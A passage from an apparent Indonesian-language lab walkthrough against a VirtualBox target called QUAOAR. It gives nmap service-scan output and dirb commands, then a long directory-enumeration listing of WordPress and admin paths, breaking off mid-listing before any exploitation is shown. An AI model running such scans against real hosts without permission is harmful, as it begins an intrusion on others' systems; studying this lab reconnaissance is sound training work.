Host is up (0.0011s latency).
Not shown: 65526 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_Hackers
110/tcp open  pop3?
|_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
|_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities 
Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
995/tcp open  ssl/pop3s?
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> 
(unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-01-26T20:31:31-05:00
|_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s

TRACEROUTE
HOP RTT     ADDRESS
1   1.06 ms 192.168.0.122 

OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds


Service yang di temukan, 

Port	Service	Product
22	ssh	OpenSSH
53	domain	ISC BIND
80	http	Apache httpd
110	pop3	
139	netbios-ssn	Samba smbd
143	imap	Dovecot imapd
445	netbios-ssn	Samba smbd
993	imap	Dovecot imapd
995	pop3s

Beberapa informasi menarik dari berbagai servis 

ssh	OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0
domain	bind.version: 9.8.1-P1
http	folder Hackers, robots.txt
pop3	dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA
netbios workgroup: WORKGROUP
imap	post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS

Tampaknya yang mungkin menarik untuk di exploit adalah port web 80.

Berburu Flag 1: Web

Pakai dirb

Lakukan, 

dirb http://192.168.0.122
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w

Hasilnya 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan 23 21:31:24 2023
URL_BASE: http://192.168.0.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt  

-----------------

GENERATED WORDS: 4612                                                           

---- Scanning URL: http://192.168.0.122/ ----
+ http://192.168.0.122/cgi-bin/ (CODE:403|SIZE:289)                                                                                                                                                                              
+ http://192.168.0.122/hacking (CODE:200|SIZE:616848)                                                                                                                                                                            
+ http://192.168.0.122/index (CODE:200|SIZE:100)                                                                                                                                                                                 
+ http://192.168.0.122/index.html (CODE:200|SIZE:100)                                                                                                                                                                            
+ http://192.168.0.122/LICENSE (CODE:200|SIZE:1672)                                                                                                                                                                              
+ http://192.168.0.122/robots (CODE:200|SIZE:271)                                                                                                                                                                                
+ http://192.168.0.122/robots.txt (CODE:200|SIZE:271)                                                                                                                                                                            
+ http://192.168.0.122/server-status (CODE:403|SIZE:294)                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/                                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/wordpress/                                                                                                                                                                                   
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/admins/                                                                                                                                                                               
+ http://192.168.0.122/upload/config (CODE:200|SIZE:0)                                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/upload/framework/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/                                                                                                                                                                              
+ http://192.168.0.122/upload/index (CODE:200|SIZE:3040)                                                                                                                                                                         
+ http://192.168.0.122/upload/index.php (CODE:200|SIZE:3040)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/languages/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/media/                                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/page/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/search/                                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/upload/temp/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/templates/                                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/ ----
==> DIRECTORY: http://192.168.0.122/wordpress/index/                                                                                                                                                                             
+ http://192.168.0.122/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/license (CODE:200|SIZE:19930)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/readme (CODE:200|SIZE:7195)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/                                                                                                                                                                          
+ http://192.168.0.122/wordpress/wp-blog-header (CODE:200|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-config (CODE:200|SIZE:0)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/                                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-cron (CODE:200|SIZE:0)                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/wordpress/wp-includes/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-links-opml (CODE:200|SIZE:217)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-load (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-login (CODE:200|SIZE:2530)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-mail (CODE:500|SIZE:3011)                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-settings (CODE:500|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-signup (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-trackback (CODE:200|SIZE:135)                                                                                                                                                                
+ http://192.168.0.122/wordpress/xmlrpc (CODE:200|SIZE:42)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/css/                                                                                                                                                                          
+ http://192.168.0.122/upload/account/forgot (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/index.php (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/login (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/logout (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/preferences (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/account/signup (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/account/templates/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/access/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/addons/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/admintools/                                                                                                                                                                    
==> DIRECTORY: http://192.168.0.122/upload/admins/groups/                                                                                                                                                                        
+ http://192.168.0.122/upload/admins/index (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/upload/admins/index.php (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/admins/interface/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/languages/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/login/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/logout/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/media/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/modules/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/pages/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/preferences/                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/admins/profiles/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/service/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/settings/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/start/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/support/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/templates/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/users/                                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/ ----
==> DIRECTORY: http://192.168.0.122/upload/framework/functions/                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index.php (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/framework/summary (CODE:403|SIZE:88)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/ ----
+ http://192.168.0.122/upload/include/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/include/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/include/yui/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/languages/ ----
+ http://192.168.0.122/upload/languages/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/media/ ----
+ http://192.168.0.122/upload/media/index (CODE:302|SIZE:0)                                                                                                                                                                      
+ http://192.168.0.122/upload/media/index.php (CODE:302|SIZE:0)                                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/ ----
+ http://192.168.0.122/upload/modules/admin (CODE:403|SIZE:79)                                                                                                                                                                   
+ http://192.168.0.122/upload/modules/admin.php (CODE:403|SIZE:79)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/news/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/                                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/ ----
+ http://192.168.0.122/upload/page/index (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/page/index.php (CODE:200|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/page/posts/                                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/search/ ----
+ http://192.168.0.122/upload/search/index (CODE:200|SIZE:3627)                                                                                                                                                                  
+ http://192.168.0.122/upload/search/index.php (CODE:200|SIZE:3627)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/ ----
+ http://192.168.0.122/upload/temp/index (CODE:302|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/temp/index.php (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/temp/search/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/templates/blank/                                                                                                                                                                      
+ http://192.168.0.122/upload/templates/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/index/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/ ----
+ http://192.168.0.122/wordpress/wp-admin/about (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/comment (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/credits (CODE:302|SIZE:0)                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/css/                                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/customize (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/edit (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/export (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/images/                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-admin/import (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/includes/                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/install (CODE:200|SIZE:1080)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/js/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/link (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/maint/                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/media (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/menu (CODE:500|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/moderation (CODE:302|SIZE:0)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/network/                                                                                                                                                                  
+ http://192.168.0.122/wordpress/wp-admin/options (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/plugins (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/post (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/profile (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/themes (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/tools (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/update (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/upgrade (CODE:200|SIZE:1173)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/upload (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/user/                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/users (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/widgets (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/ ----
+ http://192.168.0.122/wordpress/wp-content/index (CODE:200|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/plugins/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/themes/                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/upgrade/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/uploads/                                                                                                                                                                
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/css/ ----
+ http://192.168.0.122/upload/account/css/frontend (CODE:200|SIZE:1931)                                                                                                                                                          
+ http://192.168.0.122/upload/account/css/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/css/index.php (CODE:302|SIZE:0)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/templates/ ----
+ http://192.168.0.122/upload/account/templates/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/account/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/access/ ----
+ http://192.168.0.122/upload/admins/access/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/access/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/addons/ ----
+ http://192.168.0.122/upload/admins/addons/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/addons/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/admintools/ ----
+ http://192.168.0.122/upload/admins/admintools/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/admintools/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/admins/admintools/tool (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/groups/ ----
+ http://192.168.0.122/upload/admins/groups/add (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/groups/groups (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/groups/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/groups/index.php (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/groups/save (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/interface/ ----
+ http://192.168.0.122/upload/admins/interface/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/interface/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/interface/version (CODE:403|SIZE:90)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/languages/ ----
+ http://192.168.0.122/upload/admins/languages/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/languages/install (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/login/forgot/                                                                                                                                                                  
+ http://192.168.0.122/upload/admins/login/index (CODE:200|SIZE:2929)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/login/index.php (CODE:200|SIZE:2929)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/logout/ ----
+ http://192.168.0.122/upload/admins/logout/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/logout/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/media/ ----
+ http://192.168.0.122/upload/admins/media/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/media/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/media/thumb (CODE:200|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/modules/ ----
+ http://192.168.0.122/upload/admins/modules/details (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/modules/install (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/uninstall (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/pages/ ----
+ http://192.168.0.122/upload/admins/pages/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/pages/delete (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/pages/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/pages/modify (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/restore (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/pages/sections (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/pages/settings (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/trash (CODE:302|SIZE:0)                                                                                                                                                                
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/admins/preferences/ ----
+ http://192.168.0.122/upload/admins/preferences/index (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/preferences/index.php (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/preferences/save (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/profiles/ ----
+ http://192.168.0.122/upload/admins/profiles/index (CODE:200|SIZE:324)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/profiles/index.php (CODE:200|SIZE:324)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/service/ ----
+ http://192.168.0.122/upload/admins/service/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/service/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/settings/ ----
+ http://192.168.0.122/upload/admins/settings/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/settings/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/admins/settings/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/settings/setting (CODE:200|SIZE:3839)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/start/ ----
+ http://192.168.0.122/upload/admins/start/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/start/index.php (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/support/ ----
+ http://192.168.0.122/upload/admins/support/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/support/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/templates/ ----
+ http://192.168.0.122/upload/admins/templates/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/templates/install (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/users/ ----
+ http://192.168.0.122/upload/admins/users/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/users/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/users/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/users/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/users/users (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/functions/ ----
+ http://192.168.0.122/upload/framework/functions/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/framework/functions/index.php (CODE:302|SIZE:0)                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/ ----
==> DIRECTORY: http://192.168.0.122/upload/include/yui/event/                                                                                                                                                                    
+ http://192.168.0.122/upload/include/yui/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/include/yui/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/include/yui/README (CODE:200|SIZE:8488)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/yui/yahoo/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/ ----
+ http://192.168.0.122/upload/modules/news/add (CODE:403|SIZE:82)                                                                                                                                                                
+ http://192.168.0.122/upload/modules/news/comment (CODE:302|SIZE:0)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/css/                                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/delete (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/icon (CODE:200|SIZE:1058)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/info (CODE:403|SIZE:83)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/info.php (CODE:403|SIZE:83)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/install (CODE:403|SIZE:86)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/modules/news/languages/                                                                                                                                                               
